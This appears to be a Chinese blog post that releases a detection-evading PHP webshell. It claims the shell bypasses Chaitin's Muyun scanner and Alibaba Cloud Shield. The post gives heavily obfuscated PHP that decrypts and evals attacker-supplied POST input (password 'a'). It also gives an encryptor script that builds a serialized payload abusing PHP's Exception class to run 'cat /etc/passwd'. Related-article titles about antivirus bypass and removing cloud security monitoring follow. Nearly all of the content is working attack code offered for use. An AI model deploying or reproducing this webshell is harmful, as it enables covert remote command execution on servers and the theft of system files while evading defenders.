直接上代码

已经提过了长亭的牧云webshell检测平台,所以直接开源

绕过原理,一些CTF的小技巧

使用反序列化,外加php原生类绕过检测,到达webshell免杀
关键代码 echo new $sizeclass($filepath);
关键类:Exception

使用方式说明

使用加密器反序列化控制类名,以及参数,达到命令执行的效果

可正常执行代码截图 / 命令的截图

预览

预览

绕过代码(POST 密码为a)

<?php function asciitostr($sacii){$asc_arr= str_split(strtolower($sacii),2);$str='';for($i=0;$i<count($asc_arr);$i++){$str.=chr(hexdec($asc_arr[$i][1].$asc_arr[$i][0]));}return mb_convert_encoding($str,'UTF-8','GB2312');}function encrypt_src($string,$operation,$key=''){$key=md5($key);$key_length=strlen($key);$string=$operation=='D'?base64_decode($string):substr(md5($string.$key),0,8).$string;$string_length=strlen($string);$rndkey=$box=array();$result='';for($i=0;$i<=255;$i++){$rndkey[$i]=ord($key[$i%$key_length]);$box[$i]=$i;}for($j=$i=0;$i<256;$i++){$j=($j+$box[$i]+$rndkey[$i])%256;$tmp=$box[$i];$box[$i]=$box[$j];$box[$j]=$tmp;}for($a=$j=$i=0;$i<$string_length;$i++){$a=($a+1)%256;$j=($j+$box[$a])%256;$tmp=$box[$a];$box[$a]=$box[$j];$box[$j]=$tmp;$result.=chr(ord($string[$i])^($box[($box[$a]+$box[$j])%256]));}if($operation=='D'){if(substr($result,0,8)==substr(md5(substr($result,8).$key),0,8)){return substr($result,8);}else{return'';}}else{return str_replace('=','',base64_encode($result));}}$id = "yTKTBFfoj6AU4qsnucxp2OUNU9nb5AvFJZhqEqKsktDPIj0jbmsXwVoQRqQ8eyUPtBaNX1QOrj5xK6qWLB2IXV0vAjQVzjTuC7cdmazeaOkrAshuglEdh5cP3S/8bTAYM14pf0xmbb/ub1E+yxEoSnwA";$a="Je8B5s7wI5B2S2b521JE8wTzAwMD0icGxZTW1GYVRuc3hqaFBKSE9DSXFYQXlnTkR0a0dTUWNlVXJ3YktvQnp2WkxkVnVmUldpRWhkc050R0FLb2lucldsVkxSamdxWkNZUEhUeU1YREJTa3BPeEpldnpid3VtY2ZJRWFVRlFsVDl4QUxDSGp0SGlzWkhiZ0djZHN0SGlKMjFka3gwZWdqQ1BnTHoxc3RuaHNZQ01TMmQ2dVVIaXNaSGJsRFZXUzJhV1MyQkZSeDBlZ2pDUGdMejFzdG5oc1lDTXV0ZGl1WnpXY1hQOWd0R2J1WEdidVhHYmdyaUhqRkNQZ2p6dGNVNXJjWGR3SkZ6RVozY1dBMmYxU2pQaGt4MGVnakNQZ2pDUGdqQ01TMmQ2dVVIaXNaSGJsRGEwQVhkYm1LNWJBWmhkczJuV1MzTjdUQnZQZ2pDUGdqQ1BnamF0QVVuZFNYRzBBVDBNY1hXaFNZMCt1dGRpdVp6V2NYUDdUQnZQZ2pDUGdqQ1BnWGZyQVg4UEp0ZjNnamFiQVpoZHMybldTM052c2phdEFVbmRTWEcwQVhDaFJ4MGVnakNQZ0wwSGpvMEhqb2ZJUzJmWUFVR2lBWmhkZWphRXBROUtmR2lGc0RWY2VLaUhqUDBldW9mSXMzYWhKMjRQSlg5ckExOTFTdHh2VkxhNGNqeFBWWHlka0RDOWdqY2JjTGdvZUQ4dzVzcVA1QStYNXV0dlRCaDdUQnZQZ2pDUFZMYTRjakM5Z2phMGtMQlBtRkNNQTJmNVJ4MGVnakNQZ2phckFYR1lTWUM5Z2pWekJNSFFhcHVMRFFkZUQwbkhLTTlCcGZWS2ZHZlVmMVd1VXRHRnMyYWR1dGN2QVVoT0pYMUlKM3puU29IMGNadTNrTGQ2TlRRWU5iQjFIclM0UkQwOWVZZzdUQnZQZ2pDUFZYNXZnVDBQU3RHSXVqUHhtakMySGpNN1RCdlBnakNQVlhIdmdUMFBWWEh2c1pWYlVZYUlBRzA3VEJ2UGdqQ1BWWDFNRDJmNWdUMFBKVUIxZWphT3VaTVBtRkNNczJQaFJ4MGVnakNQZ2pheXVReWRrREM5Z0xIMXNvSDBTRlBNSlVhbXVaTWlnamFJQWpDZGdUUGlnamFJQWpDZGdUUFBlWUMzZUtpSGpGQ1BnakNNY0xXMGdUMFBzdEdidUtzMFoyZklzMjlNdURQTWNMVzBlS2lIakZDUGdqQ01jWDF4Z1QwUFZZUzdUQnZQZ2pDUFZYTVBsREN4UngwZWdqQ1BnamFxZ1QwUE5UaUhqRkNQZ2pDTUFZQzlnVEM3VEJ2UGdqQ1B1dDlZZ2pQTUFEQzlnVEM3Z2phaGdUeFBTM2FZSlhmSWVqYTBrTEJoUllDTUFEaU9lRHo3VEJ2UGdqQ1BnakNQZ2phT2dUMFBWWGlQbEswUFMzYVlKWGZJZWpheXVReWRrRE1QbFlDeGdUdlBWWGk3VEJ2UGdqQ1BnakNQZ2phcWdUMFBlamFJQWpDT2dMSDBTb3p3U1lQTXMyV1dTb05pZ2phMGtMYUpWWGRjZURDT2dYOVl1alBNSlVhbXVaZEpWWGlPZTEwaGVEQ2RnVHMwUngwZWdqQ1BnakNQZ2pDTWNYMXhnajQ5Z2phckFYR1lTMWlNQWQwN1RCdlBnakNQRUIwZWdqQ1BnTFZkY0xmWUpGejFTdG5kSnRId3VYcHZzdEdidUtzMFoyZklzMjlNdURQTXMyUFBtRkNNY1gxeGVETTdUQmg5VEJ2SGpQMGVUQmh0Y1U1cmNYZHdKRnoxSnRud3MyeUVjWlZpZWphMGtMQmlnamFPdVpNUGxEQ29TM2FZVllNd20rRm92K1V3V0lVdXFDMGVreDBlZ2pDUGdqYTBrTEJQbER6RnNaSGRIcmFFdVhmckoyYWRlTGZZSlhhZHMyOU11RFBNY0xXMGVETTdUQnZQZ2pDUFZYSHZzWlZiZ1QwUGdNR2pCMGFHYU1jZ0RwaG1LUTFSSzF6YXBkSHBmZnVaVUdkQXNVVnJ1WGZ0dTJXaEF0eWlKVTV3U0xHWVMzYTFjb2M0a1p2eE5LZ2JIVHAySGJQNW1LME9ncmlIakZDUGdqQ01zMlBQbERDTWNMVzBVYnpjUngwZWdqQ1BnamFJQWpDOWdMSDBTb3p3U1lQTXMyV1dTb05pZ2phckFqTTdUQnZQZ2pDUFZYMU1EMmY1Z1QwUEpVQjFlamFPdVpNUG1GQ01zMlBoUngwZWdqQ1BnamF5dVF5ZGtEQzlnTEgxc29IMFNGUE1KVWFtdVpNaWdqYUlBakNkZ1RQaWdqYUlBakNkZ1RQUGVZQzNlS2lIakZDUGdqQ01jTFcwZ1QwUFMzZkZTM2FZZWphMGtMQmlnVFFoUngwZWdqQ1BnamEwSlpDUGxEQ29WYmlIakZDUGdqQ01BREM5Z1RDN1RCdlBnakNQVlh2UGxEQ3hSeDBlZ2pDUGdqYU9nVDBQTlRpSGpGQ1Bnanp0SjNnUGVqYWhnVDBQTlRpUFZYTVBsanpiY0xWaXVVNHZWTGE0Y2pNN2dqYWhlWWloZ0xpSGpGQ1BnakNQZ2pDUFZYaVBsRENNQVlDOWxEemJjTFZpdVU0dlZYMU1EMmY1ZURDL2dUQ1BSRkNNQWJpSGpGQ1BnakNQZ2pDUFZYdlBsRHpiY0xWeEozTnZWWEh2c1pWYm1qQ01jTFcwVVlhaFpETVBtRENNSnRQUG1EendTdEJ2VlgxTUQyZjVVWWFPZVl5Y2VLaUhqRkNQZ2pDUGdqQ1BjMldoSlhwUGVqYXFnVHhQTmpNUFZYdlBlYjBQSHJCN1RCdlBnakNQZ2pDUGdqYTBKWkNQbXIwUFZYSHZzWlZiVVlhcVpLaUhqRkNQZ2p6OVRCdlBnakNQU3RmMGNaVklnTGFZQVUwdnN0R2J1S3MwWjJhZHMyOU11RFBNY1gxeGVEeFBWWHlka0RNN1RCaDlUQmgxSm9IZFN0ZFdKWGQ2dURXMUp0bndzMnlFY1pWaWVqYUVwUTlLZkdpRnNEVmNtWFZJSlVoT0pYZHdTak1oUngwZVRCdj0iO2V2YWwoJz8+Jy4kTzAwTzBPKCRPME9PMDAoJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAqMiksJE9PME8wMCgkTzBPMDAwLCRPTzAwMDAsJE9PMDAwMCksJE9PME8wMCgkTzBPMDAwLDAsJE9PMDAwMCkpKSk7Je8B5s7wI5B2S2b521";$O00OO0=urldecode(encrypt_src($id, "D", "mima"));$O00O0O=$O00OO0{3}.$O00OO0{6}.$O00OO0{33}.$O00OO0{30};$O0OO00=$O00OO0{33}.$O00OO0{10}.$O00OO0{24}.$O00OO0{10}.$O00OO0{24};$OO0O00=$O0OO00{0}.$O00OO0{18}.$O00OO0{3}.$O0OO00{0}.$O0OO00{1}.$O00OO0{24};$OO0000=$O00OO0{7}.$O00OO0{13};$O00O0O.=$O00OO0{22}.$O00OO0{36}.$O00OO0{29}.$O00OO0{26}.$O00OO0{30}.$O00OO0{32}.$O00OO0{35}.$O00OO0{26}.$O00OO0{30};eval($O00O0O( str_replace(asciitostr("A45683245337737794532423352326532313"),"",$a)));?>

加密器:

<?php
function lock_url($txt, $key = 'str')//加密器
{$txt = $txt . $key;$chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-=+";$nh = rand(0, 64);$ch = $chars[$nh];$mdKey = md5($key . $ch);$mdKey = substr($mdKey, $nh % 8, $nh % 8 + 7);$txt = base64_encode($txt);$tmp = '';$i = 0;$j = 0;$k = 0;for ($i = 0; $i < strlen($txt); $i++) {$k = $k == strlen($mdKey) ? 0 : $k;$j = ($nh + strpos($chars, $txt[$i]) + ord($mdKey[$k++])) % 64;$tmp .= $chars[$j];}return   urlencode(base64_encode($ch . $tmp));
}
$txt='O:8:"Webclome":2:{s:9:"sizeclass";s:9:"Exception";s:8:"filepath";s:15:"cat /etc/passwd";}';
echo lock_url($txt=$txt,"bnmjkliop");

PHPwebshell2022免杀bypass阿里云盾等所有安全设备相关推荐

  1. 阿里云盾(云安全)是什么?有什么作用?

    阿里云盾(云安全)是阿里巴巴集团多年来安全技术研究积累的成果,结合阿里云云计算平台强大的数据分析能力.为中小网站提供如安全漏洞检测.网页木马检测以及面向云服务器用户提供的主机入侵检测.防DDOS等一站 ...

  2. PowerShell脚本免杀/bypass/绕过杀毒软件

    项目地址:https://github.com/the-xentropy/xencrypt 原文链接:http://caidaome.com/?post=246 Xencrypt是一个PowerShe ...

  3. 如何卸载阿里云盾(安骑士)和腾讯云镜的监控?你对这件事一定很感兴趣!

    阿里云和腾讯云作为国内云计算市场的老大和小二(虽然腾讯云市场份额比阿里云要小太多了),他们的系统都是经常深度定制的,而且都安装有监控代码.当然,这对于一般用户来说,影响不大,但还是很占用资源的:如果是 ...

  4. 强制卸载阿里云盾(安骑士)监控及屏蔽云盾IP检测教程

    我们在阿里云购买的云服务器开机后进程里都会自带AliYunDun.aliyun-service.AliYunDunUpdate程序. 其实它就是阿里云盾(安骑士),是用来监控咱们的云服务器是购安全,可 ...

  5. 漏洞:阿里云盾phpMyAdmin =4.8.1 后台checkPageValidity函数缺陷可导致GETSHELL

    阿里云盾提示phpMyAdmin <=4.8.1会出现漏洞有被SHELL风险,具体漏洞提醒: 标题 phpMyAdmin <=4.8.1 后台checkPageValidity函数缺陷可导 ...

  6. 个人站点配置免费HTTPS证书、nginx配置ssl证书、阿里云盾和站长之家两种

    原文链接:https://www.aiprose.com/blog/20 相信大家都想让自己的站点支持https,今天就给大家介绍如何在个人站点中使用https,并使用nginx配置ssl证书.我们可 ...

  7. 如何卸载阿里云ECS服务器的阿里云盾和安骑士

    阿里云盾是阿里云多年来安全技术研究积累的成果,结合阿里云云计算平台强大的数据分析能力.为中小网站提供如安全漏洞检测.网页木马检测以及面向云服务器用户提供的主机入侵检测.防DDOS等一站式安全服务. 购 ...

  8. Python 阿里云盾滑块验证

    本文仅供学习交流使用,如侵立删! 记一次阿里云盾滑块验证分析并通过 操作环境 win10 . mac Python3.9 selenium.pyautogui 分析 最近在做中国庭审公开网数据分析的时 ...

  9. 阿里云盾特点及防DDoS攻击服务介绍

    阿里云盾特点及防DDoS攻击服务介绍 云盾是阿里巴巴集团多年来安全技术研究积累的成果,结合强大的威胁发现和分析能力,为用户提供一站式安全服务.云盾是阿里云产品的统称,核心产品是安骑士.DDoS防护.W ...

  10. 阿里云盾控制台在哪里?360网站安全检测不支持阿里云主机网站解决方法

    阿里云盾控制台在哪里?360网站安全检测不支持阿里云主机网站解决方法 用了阿里云快3年了,不二版本感觉阿里云的服务器用户体验做得相当好,这也是为什么选择阿里云的原因,但是最近发现一个美中不足的问题,阿 ...

最新文章

  1. 删除word菜单栏上的adobe comments的终极办法
  2. 用神经网络分类连续与离散
  3. 给ADSL用户的忠告
  4. android之AlarmManager 全局定时器
  5. 判断一个二叉树是不是对称二叉树
  6. 【水】弱化版魔术球问题
  7. 成员函数指针有多态的效果吗?
  8. 简明 python 教程 书_Python简明教程是不是这本书(简明python教程书本)
  9. Android 第一次开机速度优化
  10. 电商产品经理:电商后台系统
  11. PHP在线预览word文档的功能
  12. 小记: 程序设计注意保持逻辑清晰
  13. winXP系统( 联想)台式电脑自动开机、关机图文详细解(三)
  14. windows常用快捷键(截图,录屏,放大镜,虚拟桌面,写字板,资源管理器快捷键)
  15. 阿里OSS图片持久化,裁切,缩放,格式转换等
  16. AOZ8902CIL 瞬态电压二极管,设计用于电路保护。
  17. 数据库性能调优架构师所需的skillset
  18. 网课查题API接口(免费)
  19. 解密「UWB」精准定位黑科技
  20. 网页下载工具curl命令简介

热门文章

  1. python 条形图显示数值_如何在条形图的条形图中显示数值?
  2. 手机无限重启可能跟电压不稳有关
  3. Java开发工程师大厂面试常见问题总结(应届生版)
  4. 用Cyberduck访问iPhone/ iPod Touch
  5. matlab 定义自然数变量,matlab数值数据和变量名
  6. 分析力学-清华大学基科班课件
  7. php微信商家分账API
  8. 我找到了村里最挣钱的生意!
  9. python二维游戏编程 最强大脑游戏_4. Molten从零开始做独立游戏-python学习
  10. 移动端适配方案(rem+flex)